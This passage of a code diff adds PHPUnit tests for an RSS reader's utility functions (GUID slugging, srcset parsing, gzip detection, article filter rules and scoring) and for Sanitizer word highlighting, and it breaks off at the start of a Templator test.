+    public function test_make_guid_from_title_lowercase(): void {
+        $this->assertEquals("already-lowercase", RSSUtils::make_guid_from_title("Already Lowercase"));
+    }
+
+    public function test_make_guid_from_title_strips_html_tags(): void {
+        // strip_tags removes both tags and their content, then chars are replaced
+        $this->assertEquals("bold-article", RSSUtils::make_guid_from_title("<b>bold</b> article"));
+    }
+
+    public function test_make_guid_from_title_replaces_special_chars(): void {
+        // 5 special chars each replaced by '-'
+        $this->assertEquals("-----", RSSUtils::make_guid_from_title(" ,':;"));
+    }
+
+    public function test_make_guid_from_title_replaces_spaces(): void {
+        $this->assertEquals("hello-world", RSSUtils::make_guid_from_title("Hello World"));
+    }
+
+    public function test_make_guid_from_title_handles_unicode(): void {
+        $result = RSSUtils::make_guid_from_title("Café Résumé");
+        $this->assertStringContainsString("café", $result);
+        $this->assertStringContainsString("résumé", $result);
+    }
+
+    public function test_make_guid_from_title_empty_string(): void {
+        $this->assertEquals("", RSSUtils::make_guid_from_title(""));
+    }
+
+    public function test_make_guid_from_title_only_spaces(): void {
+        $this->assertEquals("---", RSSUtils::make_guid_from_title("   "));
+    }
+
+    public function test_make_guid_from_title_nested_tags(): void {
+        $this->assertEquals("hello-world", RSSUtils::make_guid_from_title("<div><p><b>hello</b> <i>world</i></p></div>"));
+    }
+
+    public function test_make_guid_from_title_preserves_alphanumerics_and_hyphens(): void {
+        $this->assertEquals("abc123-x-y", RSSUtils::make_guid_from_title("abc123 x y"));
+    }
+
+    // ------------------------------------------------------------------------
+    // decode_srcset() — HTML srcset attribute parsing
+    // ------------------------------------------------------------------------
+
+    public function test_decode_srcset_single_entry(): void {
+        $result = RSSUtils::decode_srcset("image.jpg 1x");
+        $this->assertCount(1, $result);
+        $this->assertEquals("image.jpg", $result[0]["url"]);
+        $this->assertEquals("1x", $result[0]["size"]);
+    }
+
+    public function test_decode_srcset_multiple_entries(): void {
+        $result = RSSUtils::decode_srcset("small.jpg 1x, medium.jpg 2x, large.jpg 3x");
+        $this->assertCount(3, $result);
+        $this->assertEquals("small.jpg", $result[0]["url"]);
+        $this->assertEquals("1x", $result[0]["size"]);
+        $this->assertEquals("medium.jpg", $result[1]["url"]);
+        $this->assertEquals("2x", $result[1]["size"]);
+        $this->assertEquals("large.jpg", $result[2]["url"]);
+        $this->assertEquals("3x", $result[2]["size"]);
+    }
+
+    public function test_decode_srcset_width_descriptors(): void {
+        $result = RSSUtils::decode_srcset("small.jpg 480w, medium.jpg 800w, large.jpg 1200w");
+        $this->assertCount(3, $result);
+        $this->assertEquals("480w", $result[0]["size"]);
+        $this->assertEquals("800w", $result[1]["size"]);
+        $this->assertEquals("1200w", $result[2]["size"]);
+    }
+
+    public function test_decode_srcset_leading_comma(): void {
+        $result = RSSUtils::decode_srcset(", image.jpg 1x");
+        $this->assertCount(1, $result);
+        $this->assertEquals("image.jpg", $result[0]["url"]);
+    }
+
+    public function test_decode_srcset_trailing_comma(): void {
+        $result = RSSUtils::decode_srcset("image.jpg 1x,");
+        $this->assertCount(1, $result);
+        $this->assertEquals("image.jpg", $result[0]["url"]);
+    }
+
+    public function test_decode_srcset_empty_string(): void {
+        $result = RSSUtils::decode_srcset("");
+        $this->assertCount(0, $result);
+    }
+
+    public function test_decode_srcset_no_size_descriptor(): void {
+        $result = RSSUtils::decode_srcset("image.jpg");
+        $this->assertCount(1, $result);
+        $this->assertEquals("image.jpg", $result[0]["url"]);
+        $this->assertEquals("", $result[0]["size"]);
+    }
+
+    public function test_decode_srcset_decimal_descriptor(): void {
+        $result = RSSUtils::decode_srcset("image.jpg 1.5x");
+        $this->assertCount(1, $result);
+        $this->assertEquals("1.5x", $result[0]["size"]);
+    }
+
+    public function test_decode_srcset_whitespace_handling(): void {
+        $result = RSSUtils::decode_srcset("  small.jpg   1x  ,   large.jpg   2x  ");
+        $this->assertCount(2, $result);
+        $this->assertEquals("small.jpg", $result[0]["url"]);
+        $this->assertEquals("1x", $result[0]["size"]);
+        $this->assertEquals("large.jpg", $result[1]["url"]);
+        $this->assertEquals("2x", $result[1]["size"]);
+    }
+
+    // ------------------------------------------------------------------------
+    // encode_srcset() — srcset reconstruction from parsed data
+    // ------------------------------------------------------------------------
+
+    public function test_encode_srcset_single_entry(): void {
+        $input = [["url" => "image.jpg", "size" => "1x"]];
+        $this->assertEquals("image.jpg 1x", RSSUtils::encode_srcset($input));
+    }
+
+    public function test_encode_srcset_multiple_entries(): void {
+        $input = [
+            ["url" => "small.jpg", "size" => "1x"],
+            ["url" => "large.jpg", "size" => "2x"],
+        ];
+        $this->assertEquals("small.jpg 1x,large.jpg 2x", RSSUtils::encode_srcset($input));
+    }
+
+    public function test_encode_srcset_empty_array(): void {
+        $this->assertEquals("", RSSUtils::encode_srcset([]));
+    }
+
+    public function test_encode_srcset_no_size(): void {
+        $input = [["url" => "image.jpg", "size" => ""]];
+        $this->assertEquals("image.jpg ", RSSUtils::encode_srcset($input));
+    }
+
+    public function test_encode_srcset_roundtrip(): void {
+        $original = "small.jpg 1x, medium.jpg 2x, large.jpg 3x";
+        $decoded = RSSUtils::decode_srcset($original);
+        $encoded = RSSUtils::encode_srcset($decoded);
+        // Round-trip should produce equivalent output (whitespace may differ)
+        $decoded_again = RSSUtils::decode_srcset($encoded);
+        $this->assertCount(3, $decoded_again);
+        $this->assertEquals($decoded[0]["url"], $decoded_again[0]["url"]);
+        $this->assertEquals($decoded[1]["url"], $decoded_again[1]["url"]);
+        $this->assertEquals($decoded[2]["url"], $decoded_again[2]["url"]);
+    }
+
+    // ------------------------------------------------------------------------
+    // is_gzipped() — gzip magic byte detection
+    // ------------------------------------------------------------------------
+
+    public function test_is_gzipped_valid_gzip(): void {
+        // Gzip magic bytes: 0x1f 0x8b 0x08
+        $gzip_data = "\x1f\x8b\x08" . "\x00\x00\x00\x00\x00\x03";
+        $this->assertTrue(RSSUtils::is_gzipped($gzip_data));
+    }
+
+    public function test_is_gzipped_plaintext(): void {
+        $this->assertFalse(RSSUtils::is_gzipped("<xml>hello</xml>"));
+    }
+
+    public function test_is_gzipped_empty_string(): void {
+        $this->assertFalse(RSSUtils::is_gzipped(""));
+    }
+
+    public function test_is_gzipped_short_string(): void {
+        $this->assertFalse(RSSUtils::is_gzipped("\x1f"));
+        $this->assertFalse(RSSUtils::is_gzipped("\x1f\x8b"));
+    }
+
+    public function test_is_gzipped_json_content(): void {
+        $this->assertFalse(RSSUtils::is_gzipped('{"key": "value"}'));
+    }
+
+    public function test_is_gzipped_xml_content(): void {
+        $this->assertFalse(RSSUtils::is_gzipped('<?xml version="1.0"?><rss version="2.0"/>'));
+    }
+
+    public function test_is_gzipped_png_header(): void {
+        // PNG magic bytes: 0x89 0x50 0x4e 0x47
+        $png_data = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a";
+        $this->assertFalse(RSSUtils::is_gzipped($png_data));
+    }
+
+    public function test_is_gzipped_jpeg_header(): void {
+        // JPEG magic bytes: 0xff 0xd8 0xff
+        $jpeg_data = "\xff\xd8\xff\xe0\x00\x10JFIF";
+        $this->assertFalse(RSSUtils::is_gzipped($jpeg_data));
+    }
+
+    // ------------------------------------------------------------------------
+    // function_enabled() — PHP disable_functions check
+    // ------------------------------------------------------------------------
+
+    public function test_function_enabled_common_functions(): void {
+        // These functions should normally be enabled
+        $this->assertTrue(RSSUtils::function_enabled("strlen"));
+        $this->assertTrue(RSSUtils::function_enabled("phpinfo"));
+    }
+
+    public function test_function_enabled_nonexistent(): void {
+        // Non-existent functions are still "enabled" (not in disable_functions list)
+        $this->assertTrue(RSSUtils::function_enabled("this_function_does_not_exist_xyz"));
+    }
+
+    // ------------------------------------------------------------------------
+    // labels_contains_caption() — label caption lookup
+    // ------------------------------------------------------------------------
+
+    public function test_labels_contains_caption_found(): void {
+        $labels = [
+            [1, "Important", "#ff0000", "#ffffff"],
+            [2, "News", "#0000ff", "#ffffff"],
+        ];
+        $this->assertTrue(RSSUtils::labels_contains_caption($labels, "Important"));
+    }
+
+    public function test_labels_contains_caption_not_found(): void {
+        $labels = [
+            [1, "Important", "#ff0000", "#ffffff"],
+            [2, "News", "#0000ff", "#ffffff"],
+        ];
+        $this->assertFalse(RSSUtils::labels_contains_caption($labels, "Archive"));
+    }
+
+    public function test_labels_contains_caption_empty_array(): void {
+        $this->assertFalse(RSSUtils::labels_contains_caption([], "Any"));
+    }
+
+    public function test_labels_contains_caption_case_sensitive(): void {
+        $labels = [[1, "Important", "#ff0000", "#ffffff"]];
+        // Caption matching is case-sensitive (exact string comparison)
+        $this->assertFalse(RSSUtils::labels_contains_caption($labels, "important"));
+    }
+
+    public function test_labels_contains_caption_special_chars(): void {
+        $labels = [[1, "Tag: News (2024)", "#ff0000", "#ffffff"]];
+        $this->assertTrue(RSSUtils::labels_contains_caption($labels, "Tag: News (2024)"));
+    }
+
+    public function test_labels_contains_caption_empty_caption(): void {
+        $labels = [[1, "", "#ff0000", "#ffffff"]];
+        $this->assertTrue(RSSUtils::labels_contains_caption($labels, ""));
+    }
+
+    // ------------------------------------------------------------------------
+    // has_article_filter_action() — filter action type check
+    // ------------------------------------------------------------------------
+
+    public function test_has_article_filter_action_found(): void {
+        $actions = [
+            ["type" => "label", "param" => "Important"],
+            ["type" => "score", "param" => "10"],
+        ];
+        $this->assertTrue(RSSUtils::has_article_filter_action($actions, "label"));
+    }
+
+    public function test_has_article_filter_action_not_found(): void {
+        $actions = [
+            ["type" => "label", "param" => "Important"],
+            ["type" => "score", "param" => "10"],
+        ];
+        $this->assertFalse(RSSUtils::has_article_filter_action($actions, "publish"));
+    }
+
+    public function test_has_article_filter_action_empty_array(): void {
+        $this->assertFalse(RSSUtils::has_article_filter_action([], "label"));
+    }
+
+    public function test_has_article_filter_action_type_case_sensitive(): void {
+        $actions = [["type" => "label", "param" => "Important"]];
+        $this->assertFalse(RSSUtils::has_article_filter_action($actions, "Label"));
+    }
+
+    public function test_has_article_filter_action_multiple_types(): void {
+        $actions = [
+            ["type" => "label", "param" => "A"],
+            ["type" => "tag", "param" => "B"],
+            ["type" => "catchup", "param" => ""],
+        ];
+        $this->assertTrue(RSSUtils::has_article_filter_action($actions, "catchup"));
+        $this->assertFalse(RSSUtils::has_article_filter_action($actions, "mark"));
+    }
+
+    // ------------------------------------------------------------------------
+    // find_article_filter_actions() — filter action type filtering
+    // ------------------------------------------------------------------------
+
+    public function test_find_article_filter_actions_single_match(): void {
+        $actions = [
+            ["type" => "label", "param" => "Important"],
+            ["type" => "score", "param" => "10"],
+        ];
+        $result = RSSUtils::find_article_filter_actions($actions, "label");
+        $this->assertCount(1, $result);
+        $this->assertEquals("label", $result[0]["type"]);
+        $this->assertEquals("Important", $result[0]["param"]);
+    }
+
+    public function test_find_article_filter_actions_multiple_matches(): void {
+        $actions = [
+            ["type" => "score", "param" => "5"],
+            ["type" => "label", "param" => "A"],
+            ["type" => "score", "param" => "10"],
+        ];
+        $result = RSSUtils::find_article_filter_actions($actions, "score");
+
+        $this->assertCount(2, $result);
+        $this->assertEquals("5", $result[0]["param"]);
+        $this->assertEquals("10", $result[1]["param"]);
+    }
+
+    public function test_find_article_filter_actions_no_match(): void {
+        $actions = [
+            ["type" => "label", "param" => "Important"],
+            ["type" => "score", "param" => "10"],
+        ];
+        $result = RSSUtils::find_article_filter_actions($actions, "publish");
+        $this->assertCount(0, $result);
+    }
+
+    public function test_find_article_filter_actions_empty_input(): void {
+        $result = RSSUtils::find_article_filter_actions([], "label");
+        $this->assertCount(0, $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // calculate_article_score() — score modifier summation
+    // ------------------------------------------------------------------------
+
+    public function test_calculate_article_score_single_modifier(): void {
+        $actions = [["type" => "score", "param" => "10"]];
+        $this->assertEquals(10, RSSUtils::calculate_article_score($actions));
+    }
+
+    public function test_calculate_article_score_multiple_modifiers(): void {
+        $actions = [
+            ["type" => "score", "param" => "5"],
+            ["type" => "label", "param" => "Important"],
+            ["type" => "score", "param" => "15"],
+        ];
+        $this->assertEquals(20, RSSUtils::calculate_article_score($actions));
+    }
+
+    public function test_calculate_article_score_negative_modifier(): void {
+        $actions = [
+            ["type" => "score", "param" => "10"],
+            ["type" => "score", "param" => "-5"],
+        ];
+        $this->assertEquals(5, RSSUtils::calculate_article_score($actions));
+    }
+
+    public function test_calculate_article_score_empty_array(): void {
+        $this->assertEquals(0, RSSUtils::calculate_article_score([]));
+    }
+
+    public function test_calculate_article_score_no_score_actions(): void {
+        $actions = [
+            ["type" => "label", "param" => "Important"],
+            ["type" => "tag", "param" => "news"],
+        ];
+        $this->assertEquals(0, RSSUtils::calculate_article_score($actions));
+    }
+
+    public function test_calculate_article_score_zero_modifier(): void {
+        $actions = [["type" => "score", "param" => "0"]];
+        $this->assertEquals(0, RSSUtils::calculate_article_score($actions));
+    }
+
+    public function test_calculate_article_score_large_values(): void {
+        $actions = [
+            ["type" => "score", "param" => "1000"],
+            ["type" => "score", "param" => "-500"],
+        ];
+        $this->assertEquals(500, RSSUtils::calculate_article_score($actions));
+    }
+
+    // ------------------------------------------------------------------------
+    // eval_article_filters() — filter rule evaluation (pure function)
+    //
+    // Note: The reg_exp values in filter rules come from the DB without
+    // regex delimiters. The code adds "/pattern/iu" automatically.
+    // ------------------------------------------------------------------------
+
+    public function test_eval_article_filters_title_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "TestLabel"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "This is a test article", "", "", "", []);
+        $this->assertCount(1, $result);
+        $this->assertEquals("label", $result[0]["type"]);
+    }
+
+    public function test_eval_article_filters_title_no_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "xyzxyz", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "TestLabel"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "This is a test article", "", "", "", []);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_content_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "content", "reg_exp" => "secret", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "Secret"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Title", "This contains a secret message", "", "", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_author_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "author", "reg_exp" => "john", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "John"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Title", "", "", "John Doe", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_link_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "link", "reg_exp" => "example\\.com", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "Example"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Title", "", "https://example.com/post", "", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_tag_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "tag", "reg_exp" => "news", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "News"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Title", "", "", "", ["news", "world"]);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_tag_no_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "tag", "reg_exp" => "sports", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "Sports"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Title", "", "", "", ["news", "world"]);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_both_title_and_content(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "both", "reg_exp" => "urgent", "inverse" => false]],
+                "actions" => [["type" => "score", "param" => "100"]],
+            ],
+        ];
+        // Match in content
+        $result = RSSUtils::eval_article_filters($filters, "Title", "This is urgent", "", "", []);
+        $this->assertCount(1, $result);
+        $this->assertEquals("score", $result[0]["type"]);
+    }
+
+    public function test_eval_article_filters_inverse_rule(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => true]],
+                "actions" => [["type" => "label", "param" => "NotTest"]],
+            ],
+        ];
+        // Inverse: should match when title does NOT contain "test"
+        $result = RSSUtils::eval_article_filters($filters, "This is normal", "", "", "", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_inverse_rule_no_match(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => true]],
+                "actions" => [["type" => "label", "param" => "NotTest"]],
+            ],
+        ];
+        // Inverse: should NOT match when title DOES contain "test"
+        $result = RSSUtils::eval_article_filters($filters, "This is a test", "", "", "", []);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_inverse_filter(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => true,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "NotTest"]],
+            ],
+        ];
+        // Inverse filter: should match when rules do NOT match
+        $result = RSSUtils::eval_article_filters($filters, "Normal article", "", "", "", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_match_any_rule(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => true,
+                "inverse" => false,
+                "rules" => [
+                    ["type" => "title", "reg_exp" => "xyz", "inverse" => false],
+                    ["type" => "author", "reg_exp" => "john", "inverse" => false],
+                ],
+                "actions" => [["type" => "label", "param" => "MatchAny"]],
+            ],
+        ];
+        // match_any_rule: author matches, title doesn't — filter should still match
+        $result = RSSUtils::eval_article_filters($filters, "No xyz here", "", "", "John Doe", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_match_all_rule(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [
+                    ["type" => "title", "reg_exp" => "hello", "inverse" => false],
+                    ["type" => "author", "reg_exp" => "john", "inverse" => false],
+                ],
+                "actions" => [["type" => "label", "param" => "AllMatch"]],
+            ],
+        ];
+        // match_all (default): both title AND author must match
+        $result = RSSUtils::eval_article_filters($filters, "Hello from John", "", "", "John Doe", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_match_all_rule_partial(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [
+                    ["type" => "title", "reg_exp" => "hello", "inverse" => false],
+                    ["type" => "author", "reg_exp" => "john", "inverse" => false],
+                ],
+                "actions" => [["type" => "label", "param" => "AllMatch"]],
+            ],
+        ];
+        // match_all: title matches but author doesn't — filter should NOT match
+        $result = RSSUtils::eval_article_filters($filters, "Hello World", "", "", "Jane Doe", []);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_stop_action(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "urgent", "inverse" => false]],
+                "actions" => [
+                    ["type" => "label", "param" => "Urgent"],
+                    ["type" => "stop", "param" => ""],
+                ],
+            ],
+            [
+                "id" => 2,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "urgent", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "AlsoUrgent"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Urgent news", "", "", "", []);
+        // First filter matches and has stop action, so second filter should not be evaluated
+        $this->assertCount(2, $result);
+        $this->assertEquals("label", $result[0]["type"]);
+        $this->assertEquals("stop", $result[1]["type"]);
+    }
+
+    public function test_eval_article_filters_multiple_filters(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "Label1"]],
+            ],
+            [
+                "id" => 2,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "content", "reg_exp" => "secret", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "Label2"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Test article", "Contains secret info", "", "", []);
+        $this->assertCount(2, $result);
+    }
+
+    public function test_eval_article_filters_matched_rules_and_filters(): void {
+        $matched_rules = [];
+        $matched_filters = [];
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "TestLabel"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Test article", "", "", "", [], $matched_rules, $matched_filters);
+        $this->assertCount(1, $result);
+        $this->assertCount(1, $matched_rules);
+        $this->assertCount(1, $matched_filters);
+        $this->assertEquals(1, $matched_filters[0]["id"]);
+    }
+
+    public function test_eval_article_filters_score_action(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "important", "inverse" => false]],
+                "actions" => [["type" => "score", "param" => "50"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Important news", "", "", "", []);
+        $this->assertCount(1, $result);
+        $this->assertEquals("score", $result[0]["type"]);
+        $this->assertEquals("50", $result[0]["param"]);
+    }
+
+    public function test_eval_article_filters_complex_regexp(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "^[A-Z][a-z]+\\s[A-Z][a-z]+$", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "ProperNames"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "John Doe", "", "", "", []);
+        $this->assertCount(1, $result);
+    }
+
+    public function test_eval_article_filters_filter_with_multiple_actions(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "critical", "inverse" => false]],
+                "actions" => [
+                    ["type" => "label", "param" => "Critical"],
+                    ["type" => "score", "param" => "100"],
+                    ["type" => "mark", "param" => ""],
+                ],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Critical update", "", "", "", []);
+        $this->assertCount(3, $result);
+        $this->assertEquals("label", $result[0]["type"]);
+        $this->assertEquals("score", $result[1]["type"]);
+        $this->assertEquals("mark", $result[2]["type"]);
+    }
+
+    public function test_eval_article_filters_empty_filters(): void {
+        $result = RSSUtils::eval_article_filters([], "Title", "Content", "Link", "Author", ["tag1"]);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_empty_regexp_skipped(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "ShouldNotMatch"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Any title", "", "", "", []);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_tag_with_no_tags(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "tag", "reg_exp" => "empty", "inverse" => false]],
+                "actions" => [["type" => "label", "param" => "Empty"]],
+            ],
+        ];
+        // With no tags, the filter should not match (empty tag array gets a dummy '' tag)
+        $result = RSSUtils::eval_article_filters($filters, "Title", "", "", "", []);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_filter_with_no_actions(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [["type" => "title", "reg_exp" => "test", "inverse" => false]],
+                "actions" => [],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Test article", "", "", "", []);
+        $this->assertCount(0, $result);
+    }
+
+    public function test_eval_article_filters_filter_with_no_rules(): void {
+        $filters = [
+            [
+                "id" => 1,
+                "match_any_rule" => false,
+                "inverse" => false,
+                "rules" => [],
+                "actions" => [["type" => "label", "param" => "NoRules"]],
+            ],
+        ];
+        $result = RSSUtils::eval_article_filters($filters, "Test article", "", "", "", []);
+        $this->assertCount(0, $result);
+    }
+}

--- a/tests_functional/SanitizerTest.php
+++ b/tests_functional/SanitizerTest.php
@@ -1,0 +1,102 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Unit tests for Sanitizer::highlight_words_str() and Sanitizer::highlight_words().
+ *
+ * These are pure PHP methods that don't require database access.
+ *
+ * @group sanitizer
+ */
+final class SanitizerTest extends TestCase {
+
+    // ──────────────────────────────────────────────────────────────────────
+    // highlight_words_str() — String-level highlighting
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_highlight_words_str_basic(): void {
+        $result = Sanitizer::highlight_words_str('Hello world', ['world']);
+        $this->assertStringContainsString('highlight', $result);
+        $this->assertStringContainsString('world', $result);
+    }
+
+    public function test_highlight_words_str_multiple_matches(): void {
+        $result = Sanitizer::highlight_words_str('test test test', ['test']);
+        $this->assertStringContainsString('highlight', $result);
+    }
+
+    public function test_highlight_words_str_no_match(): void {
+        // When no words match, DOMDocument still wraps content in <span>
+        $result = Sanitizer::highlight_words_str('Hello world', ['xyz']);
+        $this->assertStringContainsString('Hello world', $result);
+        // DOMDocument wrapping is expected behavior
+        $this->assertStringNotContainsString('highlight', $result);
+    }
+
+    public function test_highlight_words_str_preserves_html(): void {
+        $result = Sanitizer::highlight_words_str('<b>Hello</b> world', ['hello']);
+        $this->assertStringContainsString('highlight', $result);
+        $this->assertStringContainsString('Hello', $result);
+    }
+
+    public function test_highlight_words_str_unicode(): void {
+        $result = Sanitizer::highlight_words_str('中文内容测试', ['中文']);
+        $this->assertStringContainsString('highlight', $result);
+    }
+
+    public function test_highlight_words_str_empty_words_array(): void {
+        $result = Sanitizer::highlight_words_str('Hello world', []);
+        $this->assertEquals('Hello world', $result);
+    }
+
+    public function test_highlight_words_str_special_chars_in_word(): void {
+        $result = Sanitizer::highlight_words_str('test$value', ['test$value']);
+        $this->assertStringContainsString('highlight', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // highlight_words() — DOM-level highlighting
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_highlight_words_returns_true_on_match(): void {
+        $doc = new DOMDocument();
+        $doc->loadHTML('<p>Hello world</p>');
+        $xpath = new DOMXPath($doc);
+        $result = Sanitizer::highlight_words($doc, $xpath, ['world']);
+        $this->assertTrue($result);
+    }
+
+    public function test_highlight_words_returns_false_on_no_match(): void {
+        // When no words match, text nodes are still replaced (empty fragment)
+        // but highlight_words() returns true because nodes were replaced
+        $doc = new DOMDocument();
+        $doc->loadHTML('<p>Hello world</p>');
+        $xpath = new DOMXPath($doc);
+        $result = Sanitizer::highlight_words($doc, $xpath, ['xyz']);
+        // Actual behavior: returns true because child nodes were replaced
+        // even though no highlighting occurred
+        $this->assertTrue($result);
+        // Text content should still be present
+        $paragraphs = $xpath->query('//p');
+        $this->assertCount(1, $paragraphs);
+    }
+
+    public function test_highlight_words_preserves_parent_structure(): void {
+        $doc = new DOMDocument();
+        $doc->loadHTML('<div><p>Hello world</p></div>');
+        $xpath = new DOMXPath($doc);
+        Sanitizer::highlight_words($doc, $xpath, ['world']);
+        $divs = $xpath->query('//div');
+        $this->assertCount(1, $divs);
+    }
+
+    public function test_highlight_words_handles_nested_elements(): void {
+        $doc = new DOMDocument();
+        $doc->loadHTML('<div><span><p>Nested content</p></span></div>');
+        $xpath = new DOMXPath($doc);
+        Sanitizer::highlight_words($doc, $xpath, ['nested']);
+        $paragraphs = $xpath->query('//p');
+        $this->assertCount(1, $paragraphs);
+    }
+
+}

--- a/tests_functional/TemplatorTest.php
+++ b/tests_functional/TemplatorTest.php
@@ -1,0 +1,121 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Integration tests for Templator — template file resolution and rendering.
+ *
+ * Templator extends MiniTemplator and adds one responsibility:
+ *   - basename resolution: try templates.local/ first, fall back to templates/
+ *   - full/relative paths: delegate to parent unchanged
+ *
+ * These tests use temporary directories to avoid polluting the real
+ * templates/ and templates.local/ trees.
+ *
+ * @group templator
+ */
+final class TemplatorTest extends TestCase
+{
+    private string $tempDir;
+    private string $originalCwd;
+
+    protected function setUp(): void
+    {
+        $this->originalCwd = getcwd();
+        $this->tempDir = sys_get_temp_dir() . '/tt-rss-templator-test-' . uniqid();
+        mkdir($this->tempDir . '/templates.local', 0755, true);
+        mkdir($this->tempDir . '/templates', 0755, true);
+        chdir($this->tempDir);
+    }
+
+    protected function tearDown(): void
+    {
+        chdir($this->originalCwd);
+        $this->removeDir($this->tempDir);
+    }
+
+    /**
+     * Recursively remove a directory and all its contents.
